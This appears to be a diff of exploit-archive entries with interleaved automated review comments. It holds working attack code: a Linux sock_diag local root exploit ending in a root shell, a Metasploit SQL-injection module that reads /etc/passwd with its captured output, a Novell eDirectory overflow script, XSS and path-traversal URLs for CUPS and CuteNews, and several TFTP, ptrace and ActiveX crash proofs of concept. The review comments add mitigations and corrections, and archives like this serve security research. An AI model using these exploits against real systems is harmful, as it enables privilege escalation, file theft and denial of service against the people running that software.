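+else if(strcmp(argv[1],"Fedora")==0){
+commit_creds = (_commit_creds) get_symbol("commit_creds");
+prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
+sock_diag_handlers = get_symbol("sock_diag_handlers");
+nl_table = get_symbol("nl_table");
+if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
+printf("some symbols are not available!\n");
+exit(1);
+}
+family = (nl_table - sock_diag_handlers) / 4;
+printf("family=%d\n",family);
+req.r.sdiag_family = family;
+if(family>255){
+printf("nl_table is too far!\n");
+exit(1);
+}
+}
+else if(strcmp(argv[1],"Ubuntu")==0){
+commit_creds = (_commit_creds) 0xc106bc60;
+prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
+req.r.sdiag_family = 81;
+}
+unsigned long mmap_start, mmap_size;
+mmap_start = 0x10000;
+mmap_size = 0x120000;
+printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
+if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
+MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
+printf("mmap fault\n");
+exit(1);
+}
+memset((void*)mmap_start, 0x90, mmap_size);
+char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
+unsigned long *asd = &jump[4];
+*asd = (unsigned long)kernel_code;
+memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
+if ( send(fd, &req, sizeof(req), 0) < 0) {
+printf("bad send\n");
+close(fd);
+return -1;
+}
+printf("uid=%d, euid=%d\n",getuid(), geteuid() );
+if(!getuid())
+system("/bin/sh");
+}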
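Review bot: The header comment names CVE-2013-1763 and the 3.3-3.8 range but records neither the fix nor the defences that affect this proof of concept, which is what a reader assessing exposure needs from the entry. From the visible code, the `Fedora` branch depends on reading addresses out of `/proc/kallsyms` in `get_symbol()`, and `main()` places its payload in a user-space mapping created with `PROT_EXEC`, so restricting kernel pointer exposure (`kernel.kptr_restrict`) and SMEP should each interfere with it, though I have not verified that against a live system. I would add a line such as ` * mitigation: update to a kernel with the sock_diag family bounds check; kptr_restrict and SMEP limit this PoC` to the comment. The file is also C source stored as `33336.txt`, so tooling that classifies by extension will not treat it as code.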


@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/36958/info
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
This issue affects versions prior to CUPS 1.4.2.
http://www.example.com/admin/?kerberos=onmouseover=alert


@ -0,0 +1,72 @@
source: http://www.securityfocus.com/bid/37009/info
Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
Novell eDirectory 8.8 SP5 is vulnerable; other versions may also be affected.
#!usr\bin\perl
#Vulnerability has found by HACKATTACK
use WWW::Mechanize;
use LWP::Debug qw(+);
use HTTP::Cookies;
$address=$ARGV[0];
if(!$ARGV[0]){
print "Usage:perl $0 address\n";
exit();
}
$login = "$address/_LOGIN_SERVER_";
$url = "$address/dhost/";
$module = "modules?I:";
$buffer = "A" x 2000;
$vuln = $module.$buffer;
#Edit the username and password.
$user = "username";
$pass = "password";
#Edit the username and password.
my $mechanize = WWW::Mechanize->new();
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
$mechanize->timeout($url_timeout);
$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
$mechanize->submit_form(
form_name => "authenticator",
fields => {
usr => $user,
pwd => $pass},
button => 'Login');
$response2 = $mechanize->get("$url$vuln");
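Review bot: Neither the advisory text nor the `files.csv` description says that this request is sent after logging in, yet the script submits the `authenticator` form with `$user`/`$pass` before the final `get`, so the overflow appears to be reachable only with valid credentials. That matters for severity rating and for deciding which accounts to review, so I would state it in the header, e.g. `#Requires an authenticated session (valid eDirectory credentials)`. This is inferred from the visible login step; confirm it against the referenced advisory before changing the description.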

57
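--- a/platforms/osx/dos/33337.c
+++ b/platforms/osx/dos/33337.c
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/36915/info
+Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition.
+Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users.
+/*
+Mac OS X 10.5.6/10.5.7 ptrace() mutex handling DoS
+==================================================
+This code should be run in a loop and due to problems
+with mutex handling in ptrace a DoS can occur when a
+destroyed mutex is attempted to be interlocked by OSX
+kernel giving rise to a race condition. You may need
+to run this code multiple times.
+- Tested against 10.5.6
+- Tested against 10.5.7
+while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
+This code is dedicated to a friend who I met in this
+place. Long live the exploit scene. R.I.P str0ke.
+-- prdelka
+*/
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <stdio.h>
+#include <stdlib.h>
+int main(){
+pid_t pid;
+char *argv[] = {"id","","",0};
+char *envp[] = {"",0};
+pid = fork();
+if(pid == 0){
+usleep(100);
+execve("/usr/bin/id",argv,envp);
+}
+else{
+usleep(820);
+if(ptrace(PT_ATTACH,pid,0,0)==0){
+printf("[ PID: %d has been caught!\n",pid);
+if(ptrace(PT_DETACH,pid,0,0)<0){
+perror("Evil happens.");
+}
+usleep(1);
+wait(0);
+}
+else{
+perror("Fail!");
+}
+}
+return(0);
+}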

264
platforms/php/webapps/33317.txt Executable file

@ -0,0 +1,264 @@
Exploit Title: AlienVault newpolicyform.php SQLi
Date: 5/9/2014
Exploit Author: chrisdhebert[at]gmail.com
Vendor Homepage: http://www.alienvault.com/
Software Link: http://www.alienvault.com/free-downloads-services
Version: 4.6.1 and below
Tested on: Linux
CVE : n/a
Vendor Security Advisory : AV-11394 http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower
Timeline:
--------
4/14/2014 (Vulnerablity Discovered)
4/17/2014 (Vendor Informed with receipt)
5/5/2014 (Vendor Patch Released v4.7.0)
5/9/2014 (Public Release)
Vendor Discription:
------------------
OSSIM is the most widely used SIEM offering, thanks in no small part to the open source
community that has promoted its use. OSSIM provides all of the capabilities that a security
professional needs from a SIEM offering, event collection, normalization, correlation and
incident response - but it also does far more. Not simply satisfied with integrating data
from existing security tools, OSSIM is built on the Unified Security Management platform
which provides a common framework for the deployment, configuration, and management of your
security tools.
Vulnerability Details:
---------------------
The vulnerability can be classified as "SQL Injection" from authenticated users. No input validation is performed when processing parameters on the following request:
GET /ossim/policy/newpolicyform.php?insertafter='SQLi HTTP/1.1
Although this POC demonstrates READ access to files readable by u=mysql g=root o=all (such as /etc/passwd). It should be noted that, an attacker should be able to WRITE to a new file with sufficient permissions such as /tmp/newfile. After a quick search, exploiting this may be midigated by the current file permissions of /usr/share/*ossim/www/* and other vhosts handled by apache. For those with more time, other writeable locations could be leveraged with this vulnerablity.
Metasploit Module:
-----------------
##
## This module requires Metasploit: http//metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
'Description' => %q{
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
newpolicyform.php using the 'insertinto' parameter. This module exploits the
lack of input filtering to read an arbitrary file from the file system.
Any authenticated user is able to exploit this, as administrator
privileges are not required.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Hebert <chrisdhebert[at]gmail.com>'
],
'References' =>
[
['EDB', '#####TBD####']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => ['linux'],
'Privileged' => false,
'DisclosureDate' => "May 9 2014"))
register_options(
[
Opt::RPORT(443),
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
OptString.new('USERNAME', [ true, 'Single username' ]),
OptString.new('PASSWORD', [ true, 'Single password' ]),
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
], self.class)
end
def run
print_status("#{peer} - Get a valid session cookie...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
})
unless res and res.code == 200
print_error("#{peer} - Server did not respond in an expected way")
return
end
cookie = res.get_cookies
if cookie.blank?
print_error("#{peer} - Could not retrieve a cookie")
return
end
post = {
'embed' => '',
'bookmark_string' => '',
'user' => datastore['USERNAME'],
'passu' => datastore['PASSWORD'],
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
}
print_status("#{peer} - Login...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
'method' => 'POST',
'vars_post' => post,
'cookie' => cookie
})
unless res and res.code == 302
print_error("#{peer} - Server did not respond in an expected way")
return
end
unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
print_error("#{peer} - Authentication failed")
return
end
cookie = res.get_cookies
if cookie.blank?
print_error("#{peer} - Could not retrieve the authenticated cookie")
return
end
i = 0
full = ''
filename = datastore['FILEPATH'].unpack("H*")[0]
i = 0
full = ''
filename = datastore['FILEPATH'].unpack("H*")[0]
left_marker = Rex::Text.rand_text_alpha(6)
right_marker = Rex::Text.rand_text_alpha(6)
print_status("#{peer} - Exploiting SQLi...")
loop do
file = sqli(left_marker, right_marker, i, cookie, filename)
return if file.nil?
break if file.empty?
str = [file].pack("H*")
full << str
vprint_status(str)
i = i+1
end
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
print_good("File stored at path: " + path)
end
def sqli(left_marker, right_marker, i, cookie, filename)
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND ('xnDa'='xnDa"
get = {
'insertafter' => pay,
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),
'cookie' => cookie,
'vars_get' => get
})
if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/
return $1
else
print_error("Server did not respond in an expected way")
return nil
end
end
end
Metasploit Module Use Example:
-----------------------------
msf > use auxiliary/gather/alienvault_newpolicyform_sqli
msf auxiliary(alienvault_newpolicyform_sqli) > show options
Module options (auxiliary/gather/alienvault_newpolicyform_sqli):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPATH /etc/passwd yes Path to remote file
PASSWORD putpasswordhere yes Single password
Proxies no Use a proxy chain
RHOST 192.168.1.1 yes The target address
RPORT 443 yes The target port
TARGETURI / yes Relative URI of installation
USERNAME admin yes Single username
VHOST no HTTP server virtual host
msf auxiliary(alienvault_newpolicyform_sqli) > run
[*] 192.168.1.1:443 - Get a valid session cookie...
[*] 192.168.1.1:443 - Login...
[*] 192.168.1.1:443 - Exploiting SQLi...
[+] File stored at path: /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
[*] Auxiliary module execution completed
msf auxiliary(alienvault_newpolicyform_sqli) > cat /home/user/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
[*] exec: cat /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
root:x:0:0:root:/root:/usr/bin/llshell
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
munin:x:102:104::/var/lib/munin:/bin/false
postfix:x:103:106::/var/spool/postfix:/bin/false
snmp:x:104:108::/var/lib/snmp:/bin/false
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
avserver:x:106:111:AlienVault SIEM,,,:/home/avserver:/bin/false
avapi:x:107:111:AlienVault SIEM,,,:/home/avapi:/bin/bash
avidm:x:108:111:AlienVault IDM,,,:/home/avidm:/bin/false
ossec:x:1000:1000::/var/ossec/:/bin/false
ossecm:x:1001:1000::/var/ossec/:/bin/false
ossecr:x:1002:1000::/var/ossec/:/bin/false
ntop:x:109:112::/var/lib/ntop:/bin/false
avagent:x:110:111:AlienVault Agent,,,:/home/avagent:/bin/false
snort:x:111:113:Snort IDS:/var/log/snort:/bin/false
prads:x:112:114::/home/prads:/bin/false
nagios:x:113:115::/var/lib/nagios:/bin/false
stunnel4:x:114:116::/var/run/stunnel4:/bin/false
rabbitmq:x:115:117:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
mysql:x:116:118:MySQL Server,,,:/var/lib/mysql:/bin/false
msf auxiliary(alienvault_newpolicyform_sqli) >
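Review bot: The module's `Description` names the injectable parameter as 'insertinto', while the request shown under "Vulnerability Details" and the `'insertafter' => pay` line in `sqli` both use `insertafter`; anyone building a log search or WAF signature from the description would watch the wrong parameter. I would change that description line to `newpolicyform.php using the 'insertafter' parameter. This module exploits the`. The `References` entry is still the placeholder `['EDB', '#####TBD####']`, and neither the vendor advisory AV-11394 nor the fixed release 4.7.0 from the file header appears in the module, so adding `['URL', 'http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower']` would point operators at the patch. The three assignments `i = 0`, `full = ''` and `filename = ...` in `run` are also written twice in a row, and one copy can go.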

22
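--- a/platforms/php/webapps/33340.txt
+++ b/platforms/php/webapps/33340.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/36971/info
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+Note that exploits for some of the issues may require administrator privilege.
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+A successful attack will compromise the application and may aid in further attacks.
+http://www.example.com/test/cutenews/index.php?lastusername=&#039;%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=%3Cscript%3Ealert(/xss/)%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&cat_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&postponed_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&unapproved_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&news_per_page=%3Cscript%3Ealert(/xss/);%3C/script%3E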
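Review bot: This file and the five that follow (33341.txt to 33345.txt) repeat the same BID 36971 summary, which lists five issue classes, without saying which class the URLs in each file demonstrate or which CuteNews versions are affected. In this file every URL carries a `<script>alert(/xss/)</script>` value in a query parameter of index.php, so a line such as `Issue: reflected cross-site scripting via index.php query parameters` above the URLs would let a reader map the file to the output-encoding fix it calls for. 33341.txt and 33344.txt show URLs without any script or path value, so their issue class cannot be read off the file at all and needs to be stated by the author.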

16
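--- a/platforms/php/webapps/33341.txt
+++ b/platforms/php/webapps/33341.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+Note that exploits for some of the issues may require administrator privilege.
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+A successful attack will compromise the application and may aid in further attacks.
+http://www.example.com/test/cutenews/search.php?dosearch=yes&from_date_day=a&from_date_month=5&from_date_year=2003&to_date_day=4&to_date_month=5&to_date_year=2010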

18
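--- a/platforms/php/webapps/33342.txt
+++ b/platforms/php/webapps/33342.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/36971/info
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+Note that exploits for some of the issues may require administrator privilege.
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+A successful attack will compromise the application and may aid in further attacks.
+http://www.example.com/test/cutenews/search.php?user=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
+http://www.example.com/test/cutenews/search.php?title=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E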

16
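--- a/platforms/php/webapps/33343.txt
+++ b/platforms/php/webapps/33343.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+Note that exploits for some of the issues may require administrator privilege.
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+A successful attack will compromise the application and may aid in further attacks.
+http://www.example.com/test/cutenews/register.php?result=%3Cscript%3Ealert(/XSS/);%3C/script%3E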

16
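--- a/platforms/php/webapps/33344.txt
+++ b/platforms/php/webapps/33344.txt
@@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/36971/info
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+Note that exploits for some of the issues may require administrator privilege.
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+A successful attack will compromise the application and may aid in further attacks.
+http://www.example.com/test/cutenews/index.php?mod=addnews&action=addnews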

17
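--- a/platforms/php/webapps/33345.txt
+++ b/platforms/php/webapps/33345.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/36971/info
+CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
+Note that exploits for some of the issues may require administrator privilege.
+Successful exploits may allow attackers to:
+- obtain sensitive information
+- gain unauthorized access to the affected application
+- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
+- hijack user sessions
+- execute arbitrary commands in the context of the webserver process
+A successful attack will compromise the application and may aid in further attacks.
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source=../users.db.php%00
+http://www.example.com/test/cutenews/index.php?mod=editnews&action=editnews&id=1255182669&source=../users.db.php%00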

39
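--- a/platforms/windows/dos/33348.pl
+++ b/platforms/windows/dos/33348.pl
@@ -0,0 +1,39 @@
+# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
+# Date: 13/05/2014
+# Exploit Author: j0s3h4x0r
+# Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
+# Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
+# Version: 4.5 32 bits / 4.5 64 bits
+# Tested on: [Windows 7 x64]
+#this proof of concept code will crash tftpd32 and tftpd64
+#you can try changing $j and $i loop limits
+#most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
+#and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
+## Exploit-DB Note: $j=5, $i=2500 caused a crash.
+#!/usr/bin/perl -w
+use IO::Socket;
+for (my $j = 0; $j < 2; $j++)
+{
+sleep(2);
+for (my $i = 0; $i < 1500; $i++)
+{
+$st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
+$p_c_buffer = "\x0c\x0d" x 10;
+print $st_socket $p_c_buffer;
+close($st_socket);
+print "sent " . $i . "\n";
+}
+}
+exit;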
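Review bot: The header comments mix the confirmed result (the service crashes) with a guess that code execution "may be possible", and nothing else in the file supports the second claim; a reader rating the risk needs the two kept apart. I would add a line after the existing comments such as `# Confirmed impact: crash of the TFTP service (DoS); code execution is unconfirmed.`. The header also gives no fixed version or vendor reference, so `# Fixed in: <version, to be confirmed>` is worth adding. Until a fixed build is identified, the exposure this file describes is limited by restricting UDP port 69 to trusted hosts, since that is the only port the script talks to.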

26
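--- a/platforms/windows/dos/33350.xml
+++ b/platforms/windows/dos/33350.xml
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/37007/info
+Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
+A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
+Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected.
+<?XML version='1.0' standalone='yes' ?>
+<package><job id='DoneInVBS' debug='false' error='true'>
+<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
+<script language='vbscript'>
+arg1=String(11284, "A")
+target.RegisterMe arg1
+</script>
+</job>
+</package>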
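Review bot: The description names the affected build (9.0.0.2162) and the `<object>` line gives the control's class ID, but the file offers nothing for readers who cannot upgrade. I would add a header line such as `Mitigation: upgrade Yahoo! Messenger, or set the Internet Explorer kill bit for CLSID 58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86`, which stops the browser from instantiating the control. No fixed version is recorded either; `Fixed in: <version, to be confirmed>` would complete the header.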


@ -1,24 +1,24 @@
#!/usr/bin/python
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/pt360dos.py.txt
import socket
import sys
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = '"'*160
mode = "netascii"
muha = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(muha, (host, port))
# milw0rm.com [2008-03-26]
#!/usr/bin/python
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
# Coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/pt360dos.py.txt
import socket
import sys
host = '172.16.167.134'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = '"'*160
mode = "netascii"
muha = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(muha, (host, port))
# milw0rm.com [2008-03-26]


@ -1,281 +1,281 @@
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
1. *Advisory Information*
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
Advisory ID: CORE-2009-0820
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
Date published: 2009-08-31
Date of last update: 2009-08-31
Vendors contacted: Simon Kelley
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36120, 36121
CVE Name: CVE-2009-2957, CVE-2009-2958
3. *Vulnerability Description*
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
has been found that may allow an attacker to execute arbitrary code on
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
enabled ('--enable-tfp'). This service is not enabled by default on most
distributions; in particular it is not enabled by default on OpenWRT or
DD-WRT. Chances of successful exploitation increase when a long
directory prefix is used for TFTP. Code will be executed with the
privileges of the user running dnsmasq, which is normally a
non-privileged one.
Additionally there is a potential DoS attack to the TFTP service by
exploiting a null-pointer dereference vulnerability.
4. *Vulnerable packages*
. dnsmasq 2.40.
. dnsmasq 2.41.
. dnsmasq 2.42.
. dnsmasq 2.43.
. dnsmasq 2.44.
. dnsmasq 2.45.
. dnsmasq 2.46.
. dnsmasq 2.47.
. dnsmasq 2.48.
. dnsmasq 2.49.
. Older versions are probably affected too, but they were not checked.
5. *Non-vulnerable packages*
. dnsmasq 2.50
6. *Vendor Information, Solutions and Workarounds*
If the TFTP service is enabled and patching is not available
immediately, a valid workaround is to filter TFTP for untrusted hosts in
the network (such as the Internet). This is the default configuration
when enabling TFTP on most home routers.
Patches are already available from the software author. Most
distributions should release updates for binary packages soon.
7. *Credits*
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
Herederos de Don Pablo" of Core Security Technologies.
The null-pointer dereference (CVE-2009-2958) was reported to the author
of dnsmasq independently by an uncredited code auditor. It was merged
with this advisory for user's convenience.
8. *Technical Description*
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
First let's focus on the overflow vulnerability. The 'tftp_request'
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
'MAXDNAME' bytes (defaulting to 1025).
/-----------
else if (filename[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, filename, MAXDNAME);
- -----------/
This may cause a heap overflow because 'daemon->namebuff' may already
contain data, namely the configured 'daemon->tftp_prefix' passed to the
daemon via a configuration file.
/-----------
if (daemon->tftp_prefix)
{
if (daemon->tftp_prefix[0] == '/')
daemon->namebuff[0] = 0;
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
- -----------/
The default prefix is '/var/tftpd', but if a longer prefix is used,
arbitrary code execution may be possible.
Sending the string resulting from the execution of the following python
snippet to a vulnerable server, with a long enough directory prefix
configured, should crash the daemon.
/-----------
import sys
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
- -----------/
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
Now onto the null-pointer dereference. The user can crash the service by
handcrafting a packet, because of a problem on the guard of the first if
inside this code loop:
/-----------
while ((opt = next(&p, end)))
{
if (strcasecmp(opt, "blksize") == 0 &&
(opt = next(&p, end)) &&
!(daemon->options & OPT_TFTP_NOBLOCK))
{
transfer->blocksize = atoi(opt);
if (transfer->blocksize < 1)
transfer->blocksize = 1;
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
transfer->opt_blocksize = 1;
transfer->block = 0;
}
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
!transfer->netascii)
{
transfer->opt_transize = 1;
transfer->block = 0;
}
}
- -----------/
The problem exists because the guard of the first if includes the result
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
derrefence the null-pointer.
9. *Report Timeline*
. 2009-08-20:
Core Security Technologies notifies Simon Kelley of the vulnerability,
including technical details of the vulnerability in an advisory draft.
. 2009-08-21:
Simon Kelley acknowledges the vulnerability and confirms to be working
on a patch. He also informs that he is aware that most home router
distributions have tftp turned off by default, and firewalled, and
suggests this should be mentioned on the advisory. Simon also mentions
that a NULL-pointer dereference bug has also been discovered on that
code, and suggests merging both bugs in the same advisory. Monday 31/08
is accepted as a possible release date for this advisory, and help is
offered in contacting package maintainers of dnsmasq for most operating
systems.
. 2009-08-21:
Core changes the advisory draft to accommodate Simon's suggestions.
About the NULL-pointer dereference, Core mentions the terms it thinks
appropriate for the bug to be merged into this advisory, and details how
this would affect the following procedures, such as asking for a
CVE/Bugtraq ID.
. 2009-08-23:
Simon Kelley contacts Core back, saying that the terms for the
null-pointer derrefence bug to be included in the advisory are ok. He
also mentions that the finder of this bug prefers to remain uncredited
in this advisory. Details are sent by him about the new bug so that the
advisory draft can be updated to include it.
. 2009-08-23:
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
each vulnerability reported in this advisory should be assigned its own.
. 2009-08-23:
Vincent Danen, from Red Hat's Security Response Team contacts Core in
order to discuss both vulnerabilities by a secure communications
